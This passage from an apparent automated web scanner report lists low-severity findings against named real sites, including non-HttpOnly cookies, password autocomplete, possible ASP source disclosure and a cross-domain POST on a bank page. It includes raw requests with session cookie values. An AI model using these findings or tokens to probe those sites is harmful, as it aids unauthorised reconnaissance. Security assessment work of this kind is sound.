The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /gossip/index.html HTTP/1.1
Host: www.nydailynews.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.nydailynews.com/news/ny_crime/2011/09/26/2011-09-26_activists_post_identity_of_nypd_officer_who_peppersprayed_wall_street_protesters.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-229162790-1315773961012; Zvents=v8jp7ej93n; zvents_tracker_sid=13171296713740.4048269435297698; tmq=kvqD%3DT; __vrf=5gqecvg9ez9yrb4n; __vru=http://www.nydailynews.com/news/ny_crime/2011/09/26/2011-09-26_activists_post_identity_of_nypd_officer_who_peppersprayed_wall_street_protesters.html; __utma=104774431.1050959437.1317129701.1317129701.1317129701.1; __utmb=104774431.2.10.1317129701; __utmc=104774431; __utmz=104774431.1317129701.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __vry=0

Response

HTTP/1.1 200 OK
Date: Tue, 27 Sep 2011 13:20:36 GMT
Server: Apache
Keep-Alive: timeout=3, max=998
Content-Type: text/html
Content-Language: en
Age: 108
Via: AX-CACHE-2.4:20
Vary: Accept-encoding
Set-Cookie: sto-id-sg-web-8080=BOACAKAK; Expires=Tue, 27-Sep-2011 02:16:24 GMT; Path=/
Content-Length: 74175

<!DOCTYPE html>
<html lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="imagetoolbar" content="no" />
<meta property="og:site_name" conten
...[SNIP]...

3.19. http://www.nydailynews.com/img/static/covers/backpage_cover.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nydailynews.com
Path:   /img/static/covers/backpage_cover.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /img/static/covers/backpage_cover.jpg?1317129648 HTTP/1.1
Host: www.nydailynews.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.nydailynews.com/index.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-229162790-1315773961012; __utma=263866259.366694639.1315773952.1315773952.1315773952.1; __utmz=263866259.1315773952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); Zvents=v8jp7ej93n

Response

HTTP/1.1 200 OK
Date: Tue, 27 Sep 2011 13:20:30 GMT
Server: Apache
Last-Modified: Tue, 27 Sep 2011 05:57:05 GMT
Accept-Ranges: bytes
Content-Length: 19187
Cache-Control: max-age=14515200
Expires: Tue, 13 Mar 2012 13:20:30 GMT
Keep-Alive: timeout=3, max=998
Content-Type: image/jpeg
Content-Language: en
Age: 22
Via: AX-CACHE-2.4:20
Set-Cookie: sto-id-sg-web-8080=BPACAKAK; Expires=Tue, 27-Sep-2011 02:16:18 GMT; Path=/

......JFIF.....d.d......Ducky.......P......Adobe.d.....................................................        

       ......................    ..    .    .............................................................
...[SNIP]...

3.20. http://www.nydailynews.com/img/static/covers/frontpage_cover.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nydailynews.com
Path:   /img/static/covers/frontpage_cover.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /img/static/covers/frontpage_cover.jpg?1317129648 HTTP/1.1
Host: www.nydailynews.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.nydailynews.com/index.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-229162790-1315773961012; __utma=263866259.366694639.1315773952.1315773952.1315773952.1; __utmz=263866259.1315773952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); Zvents=v8jp7ej93n

Response

HTTP/1.1 200 OK
Date: Tue, 27 Sep 2011 13:20:49 GMT
Server: Apache
Last-Modified: Tue, 27 Sep 2011 05:56:50 GMT
Accept-Ranges: bytes
Content-Length: 20988
Cache-Control: max-age=14515200
Expires: Tue, 13 Mar 2012 13:20:49 GMT
Keep-Alive: timeout=3, max=986
Content-Type: image/jpeg
Content-Language: en
Age: 22
Via: AX-CACHE-2.4:20
Set-Cookie: sto-id-sg-web-8080=CBACAKAK; Expires=Tue, 27-Sep-2011 02:16:18 GMT; Path=/

......JFIF.....d.d......Ducky.......P......Adobe.d.....................................................        

       ......................    ..    .    .............................................................
...[SNIP]...

3.21. http://www.nydailynews.com/img/static/twitter/twitter_footer.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nydailynews.com
Path:   /img/static/twitter/twitter_footer.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /img/static/twitter/twitter_footer.jpg HTTP/1.1
Host: www.nydailynews.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.nydailynews.com/news/ny_crime/2011/09/26/2011-09-26_activists_post_identity_of_nypd_officer_who_peppersprayed_wall_street_protesters.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-229162790-1315773961012; Zvents=v8jp7ej93n; zvents_tracker_sid=13171296713740.4048269435297698; tmq=kvqD%3DT; __vry=0; __vrf=5gqecvg9ez9yrb4n; __vru=http://www.nydailynews.com/news/ny_crime/2011/09/26/2011-09-26_activists_post_identity_of_nypd_officer_who_peppersprayed_wall_street_protesters.html; __utma=263866259.366694639.1315773952.1315773952.1317129675.2; __utmb=263866259.2.10.1317129675; __utmc=263866259; __utmz=263866259.1315773952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Tue, 27 Sep 2011 13:16:26 GMT
Server: Apache
Last-Modified: Thu, 24 Jun 2010 14:16:01 GMT
Accept-Ranges: bytes
Content-Length: 2215
Cache-Control: max-age=14515200
Expires: Tue, 13 Mar 2012 13:16:26 GMT
Keep-Alive: timeout=3, max=999
Content-Type: image/jpeg
Content-Language: en
Age: 297
Via: AX-CACHE-2.4:20
Set-Cookie: sto-id-sg-web-8080=BPACAKAK; Expires=Tue, 27-Sep-2011 02:12:15 GMT; Path=/

......JFIF.....d.d......Ducky.......P......Adobe.d.....................................................        

       ......................    ..    .    ........................................................(.+..
...[SNIP]...

3.22. http://www.nydailynews.com/news/ny_crime/2011/09/26/2011-09-26_activists_post_identity_of_nypd_officer_who_peppersprayed_wall_street_protesters.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nydailynews.com
Path:   /news/ny_crime/2011/09/26/2011-09-26_activists_post_identity_of_nypd_officer_who_peppersprayed_wall_street_protesters.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /news/ny_crime/2011/09/26/2011-09-26_activists_post_identity_of_nypd_officer_who_peppersprayed_wall_street_protesters.html HTTP/1.1
Host: www.nydailynews.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.nydailynews.com/index.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-229162790-1315773961012; Zvents=v8jp7ej93n; __vrf=5gqecvg9ez9yrb4n; __vru=http://www.nydailynews.com/index.html; zvents_tracker_sid=13171296713740.4048269435297698; __utma=263866259.366694639.1315773952.1315773952.1317129675.2; __utmb=263866259.1.10.1317129675; __utmc=263866259; __utmz=263866259.1315773952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvqD%3DT; __vry=0

Response

HTTP/1.1 200 OK
Date: Tue, 27 Sep 2011 13:22:10 GMT
Server: Apache
Content-Type: text/html
Content-Language: en
Age: 25
Via: AX-CACHE-2.4:20
Vary: Accept-encoding
Set-Cookie: sto-id-sg-web-8080=CAACAKAK; Expires=Tue, 27-Sep-2011 02:16:35 GMT; Path=/
Content-Length: 73043

<!DOCTYPE html>
<html lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="imagetoolbar" content="no" />
<meta property="og:site_name" conten
...[SNIP]...

3.23. http://www.nydailynews.com/nydn/dwr/call/plaincall/mostPopularStories.getMostPopularStoriesLists.dwr  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nydailynews.com
Path:   /nydn/dwr/call/plaincall/mostPopularStories.getMostPopularStoriesLists.dwr

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /nydn/dwr/call/plaincall/mostPopularStories.getMostPopularStoriesLists.dwr HTTP/1.1
Host: www.nydailynews.com
Proxy-Connection: keep-alive
Content-Length: 222
Origin: http://www.nydailynews.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Content-Type: text/plain
Accept: */*
Referer: http://www.nydailynews.com/gossip/index.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-229162790-1315773961012; Zvents=v8jp7ej93n; zvents_tracker_sid=13171296713740.4048269435297698; tmq=kvqD%3DT; __vry=0; __vrf=5gqecvg9ez9yrb4n; __vru=http://www.nydailynews.com/gossip/index.html; __utma=263866259.166704248.1317129768.1317129768.1317129768.1; __utmb=263866259.1.10.1317129768; __utmc=263866259; __utmz=263866259.1317129768.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

callCount=1
page=/gossip/index.html
httpSessionId=
scriptSessionId=3051AE2B8D71AA44AF807982E5BE96C8542
c0-scriptName=mostPopularStories
c0-methodName=getMostPopularStoriesLists
c0-id=0
c0-param0=strin
...[SNIP]...

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Content-Type: text/plain;charset=ISO-8859-1
Date: Tue, 27 Sep 2011 13:31:28 GMT
Vary: Accept-encoding
Set-Cookie: sto-id-sg-nydnapp-8080=BPADAKAK; Expires=Tue, 27-Sep-2011 02:18:21 GMT; Path=/
Content-Length: 2206

//#DWR-INSERT
//#DWR-REPLY
var s0={};var s1={};var s2={};var s3={};var s4={};var s5={};var s6={};var s7={};var s8={};var s9={};s0.headline="Patti Stanger backtracks, apologizes to gays";s0.url="http:/
...[SNIP]...

3.24. http://www.nydailynews.com/nydn/dwr/engine.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nydailynews.com
Path:   /nydn/dwr/engine.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /nydn/dwr/engine.js HTTP/1.1
Host: www.nydailynews.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.nydailynews.com/index.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-229162790-1315773961012; __utma=263866259.366694639.1315773952.1315773952.1315773952.1; __utmz=263866259.1315773952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
pragma: public
Expires: 0
Cache-Control: must-revalidate, post-check=0, pre-check=0
Last-Modified: Sun, 25 Sep 2011 18:43:53 GMT
ETag: "1316976233000"
Content-Type: text/javascript;charset=ISO-8859-1
Date: Tue, 27 Sep 2011 13:27:16 GMT
Age: 108
Via: AX-CACHE-2.4:20
Vary: Accept-encoding
Set-Cookie: sto-id-sg-nydnapp-8080=CBADAKAK; Expires=Tue, 27-Sep-2011 02:14:49 GMT; Path=/
Content-Length: 43499

/*
* Copyright 2005 Joe Walker
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of th
...[SNIP]...

3.25. http://www.nydailynews.com/nydn/dwr/interface/mostEmailedStories.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nydailynews.com
Path:   /nydn/dwr/interface/mostEmailedStories.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /nydn/dwr/interface/mostEmailedStories.js HTTP/1.1
Host: www.nydailynews.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.nydailynews.com/index.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-229162790-1315773961012; __utma=263866259.366694639.1315773952.1315773952.1315773952.1; __utmz=263866259.1315773952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Content-Type: text/plain;charset=ISO-8859-1
Date: Tue, 27 Sep 2011 13:28:14 GMT
Age: 290
Via: AX-CACHE-2.4:20
Vary: Accept-encoding
Set-Cookie: sto-id-sg-nydnapp-8080=CAADAKAK; Expires=Tue, 27-Sep-2011 02:11:47 GMT; Path=/
Content-Length: 496


// Provide a default path to dwr.engine
if (dwr == null) var dwr = {};
if (dwr.engine == null) dwr.engine = {};
if (DWREngine == null) var DWREngine = dwr.engine;

dwr.engine._defaultPath = '/nydn/dw
...[SNIP]...

3.26. http://www.nydailynews.com/nydn/dwr/interface/mostPopularStories.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nydailynews.com
Path:   /nydn/dwr/interface/mostPopularStories.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /nydn/dwr/interface/mostPopularStories.js HTTP/1.1
Host: www.nydailynews.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.nydailynews.com/index.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-229162790-1315773961012; __utma=263866259.366694639.1315773952.1315773952.1315773952.1; __utmz=263866259.1315773952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Content-Type: text/plain;charset=ISO-8859-1
Date: Tue, 27 Sep 2011 13:29:13 GMT
Age: 31
Via: AX-CACHE-2.4:20
Vary: Accept-encoding
Set-Cookie: sto-id-sg-nydnapp-8080=BPADAKAK; Expires=Tue, 27-Sep-2011 02:16:06 GMT; Path=/
Content-Length: 496


// Provide a default path to dwr.engine
if (dwr == null) var dwr = {};
if (dwr.engine == null) dwr.engine = {};
if (DWREngine == null) var DWREngine = dwr.engine;

dwr.engine._defaultPath = '/nydn/dw
...[SNIP]...

3.27. http://www.nydailynews.com/nydn/dwr/util.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nydailynews.com
Path:   /nydn/dwr/util.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /nydn/dwr/util.js HTTP/1.1
Host: www.nydailynews.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.nydailynews.com/index.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-229162790-1315773961012; __utma=263866259.366694639.1315773952.1315773952.1315773952.1; __utmz=263866259.1315773952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Last-Modified: Sun, 25 Sep 2011 18:41:43 GMT
ETag: "1316976103000"
Content-Type: text/javascript;charset=ISO-8859-1
Date: Tue, 27 Sep 2011 13:22:24 GMT
Age: 197
Via: AX-CACHE-2.4:20
Vary: Accept-encoding
Set-Cookie: sto-id-sg-nydnapp-8080=BOADAKAK; Expires=Tue, 27-Sep-2011 02:13:20 GMT; Path=/
Content-Length: 35719

/*
* Copyright 2005 Joe Walker
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of th
...[SNIP]...

4. Password field with autocomplete enabled  previous  next
There are 2 instances of this issue:

Issue background

Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.

The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.

Issue remediation

To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).


4.1. https://hackalert.armorize.com/login.php  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hackalert.armorize.com
Path:   /login.php

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /login.php HTTP/1.1
Host: hackalert.armorize.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://hackalert.armorize.com/default.php
Cookie: PHPSESSID=mvo1cqhvtqp54mroj1122v1io59e387e; LanguagePreference=1

Response

HTTP/1.1 200 OK
Date: Mon, 26 Sep 2011 20:46:06 GMT
Server: Apache/2.2.13 (Linux/SUSE)
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 20952

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:v="urn:schemas-microsoft-com
...[SNIP]...
<div class="preLoginForm">

<form method="post" action="login.php" enctype="multipart/form-data" name="login">
<input type="hidden" name="status" value="login">
...[SNIP]...
<td><input name="password" class="normal" type="password" size="25" maxlength="32" onfocus="this.className='highlight'" onblur="this.className='normal'" value="" /></td>
...[SNIP]...

4.2. https://hackalert.armorize.com/register.php  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hackalert.armorize.com
Path:   /register.php

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /register.php HTTP/1.1
Host: hackalert.armorize.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://hackalert.armorize.com/
Cookie: PHPSESSID=mvo1cqhvtqp54mroj1122v1io59e387e; LanguagePreference=1

Response

HTTP/1.1 200 OK
Date: Mon, 26 Sep 2011 20:45:30 GMT
Server: Apache/2.2.13 (Linux/SUSE)
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 153778

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="X-UA-Compatible" content="IE=7">
   <meta h
...[SNIP]...
<div class="registerForm">
<form action="register.php" method="post" name="registerForm">
<input type="hidden" name="buy" value="true">
...[SNIP]...
<td>
                                                           <input id="passInput" type="password" size="20" name="pass" value="" class="input" style="width:100px;" onFocus="document.getElementById('passLabel').className = 'labelHover'; this.className = 'inputHover'; doFx.setOpacity('inputPassIcon',1);" onBlur="document.getElementById('passLabel').className = 'label'; this.className = 'input'; doFx.setOpacity('inputPassIcon',0.6);" />
</td>
...[SNIP]...
<td>
                                                           <input id="passConfInput" type="password" size="20" name="pass_conf" value="" class="input" style="width:100px;" onFocus="document.getElementById('passConfLabel').className = 'labelHover'; this.className = 'inputHover'; doFx.setOpacity('inputPassConfIcon',1);" onBlur="document.getElementById('passConfLabel').className = 'label'; this.className = 'input'; doFx.setOpacity('inputPassConfIcon',0.6); passConfirm();" onKeyUp="passConfirm();" />
                                                           <img id="passValid" src="images/i.gif" width="16" height="16" title="" align="absmiddle" border="0" style="visibility:hidden;">
...[SNIP]...

5. Source code disclosure  previous  next

Summary

Severity:   Low
Confidence:   Tentative
Host:   https://www.nbc.ca
Path:   /WebInfoWebFiles/wi/calculator/OrderBusinessCreditCard/include/OrderBusinessCreditCard.css

Issue detail

The application appears to disclose some server-side source code written in ASP.

Issue background

Server-side source code may contain sensitive information which can help an attacker formulate attacks against the application.

Issue remediation

Server-side source code is normally disclosed to clients as a result of typographical errors in scripts or because of misconfiguration, such as failing to grant executable permissions to a script or directory. You should review the cause of the code disclosure and prevent it from happening.

Request

GET /WebInfoWebFiles/wi/calculator/OrderBusinessCreditCard/include/OrderBusinessCreditCard.css HTTP/1.1
Host: www.nbc.ca
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: https://www.nbc.ca/WebInfoWeb/DispatchRequest?aliasDispatcher=orderBusinessCreditCardWelcome&action=3800&lang=en&firstCardId=81903&secondCardId=81801&thirdCardId=&numberOfCheckedCard=2&firstCheckBoxName=cardId_81903&secondCheckBoxName=cardId_81801&thirdCheckBoxName=&catId=&cardNumberInput=81903&promoIdentificationInput=CIAN
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: newCookieBNC=1000; _ongletMC=06; JSESSIONID=0000RORNCPD4BNwSVxzUNqUz0oL:-1; lang=en

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Tue, 27 Sep 2011 13:41:40 GMT
Content-length: 20275
Content-type: text/css
Last-modified: Mon, 02 May 2011 15:12:06 GMT
Etag: "4f33-4dbec9c6"
Accept-ranges: bytes

/*d.but dcc166*/
BODY {    FONT-SIZE: 12px; COLOR: #000000; FONT-FAMILY: arial, helvetica, sans serif }
TD {    FONT-SIZE: 12px; COLOR: #000000; FONT-FAMILY: arial, helvetica, sans serif }
P {    FONT-SIZE:
...[SNIP]...
ING-TOP: 0px; BACKGROUND-COLOR: #ffffff; TEXT-DECORATION: none
}
.button {
   BORDER-RIGHT: #ffffff 0px solid; BORDER-TOP: #ffffff 0px solid; FONT-WEIGHT: bold; FONT-SIZE: 12px; BACKGROUND-IMAGE: url(<%=env.getStaticPath()%>/wi/calculator/OrderCreditCard/img/<%=langCd%>/btn_3d_110px.gif); BORDER-LEFT: #ffffff 0px solid; CURSOR: pointer; COLOR: #ffffff; BORDER-BOTTOM: #ffffff 0px solid; FONT-STYLE: normal; FONT-FAMILY: arial, helvetica, sans-serif; HEIGHT: 30px; BACKG
...[SNIP]...

6. Cross-domain POST  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://easywebsoc.tdcanadatrust.com
Path:   /servlet/ca.tdbank.banking.servlet.DefaultServlet

Issue detail

The page contains a form which POSTs data to the domain easywebsoc.td.com. The form contains the following fields:

Issue background

The POSTing of data between domains does not necessarily constitute a security vulnerability. You should review the contents of the information that is being transmitted between domains, and determine whether the originating application should be trusting the receiving domain with this information.

Request

GET /servlet/ca.tdbank.banking.servlet.DefaultServlet?referer=main&FPL=CORE HTTP/1.1
Host: easywebsoc.tdcanadatrust.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrandReferrer=http%3A//www.tdcanadatrust.com/products-services/banking/index-banking.jsp; mbox=session#1317130064411-279159#1317132430|check#true#1317130630; s_pers=%20s_vnum_d%3D1317186000473%2526vn%253D1%7C1317186000473%3B%20s_vnum_w%3D1317531600477%2526vn%253D1%7C1317531600477%3B%20s_vnum_m%3D1317445200480%2526vn%253D1%7C1317445200480%3B%20s_cmchan%3D%255B%255B'Natural%252520Search'%252C'1317130067485'%255D%252C%255B'Referrers'%252C'1317130108011'%255D%255D%7C1474982908011%3B%20sinvisit_d%3Dtrue%7C1317132370580%3B%20sinvisit_w%3Dtrue%7C1317132370587%3B%20sinvisit_m%3Dtrue%7C1317132370590%3B%20s_nr%3D1317130570597%7C1319722570597%3B; s_sess=%20s_cc%3Dtrue%3B%20c_m%3Dundefinedwww.tdcanadatrust.comwww.tdcanadatrust.com%3B%20s_sq%3D%3B; com.td.WAWID=easyweb.tdcanadatrust.com; sitecontext=48790aaa-b1a4-4884-9226-8425d8c74fcb

Response

HTTP/1.1 200 OK
Date: Tue, 27 Sep 2011 13:36:08 GMT
Server: IBM_HTTP_Server
Content-Length: 493
Set-Cookie: JSESSIONID=0000z0R1gAY_3yuk1NfI5hS46Me:15aml0faa; Path=/; Secure
Set-Cookie: JSESSIONID=0000gxQROYP7aPXFKjRd4cdL2zh:15aml0faa; Path=/; Secure
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache="set-cookie, set-cookie2"
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CUR DEV PSA PSD CONo TELo ADM TAI OUR LEG PHY ONL UNI FIN CNT PRE GOV PUR NAV INT COM STA"
Keep-Alive: timeout=3, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US


<html>
<head>
   <script language="JavaScript">
       function sendToLogin(){        
           document.cipRedirect.submit();            
       }
   </script>
</head>
